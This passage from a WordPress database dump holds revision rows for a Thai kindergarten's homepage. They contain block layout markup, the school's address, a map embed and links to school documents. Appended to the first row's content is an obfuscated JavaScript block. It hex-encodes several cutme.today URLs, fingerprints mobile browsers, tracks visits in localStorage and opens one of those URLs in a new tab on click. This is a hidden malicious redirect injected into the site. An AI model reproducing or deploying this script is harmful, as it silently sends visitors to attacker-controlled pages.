{\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-28 10:17:49','2024-08-28 03:17:49','',19,'http://watprato.ssk.in.th/?p=242',0,'revision','',0),
(243,2,'2024-08-28 11:36:50','2024-08-28 04:36:50','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap 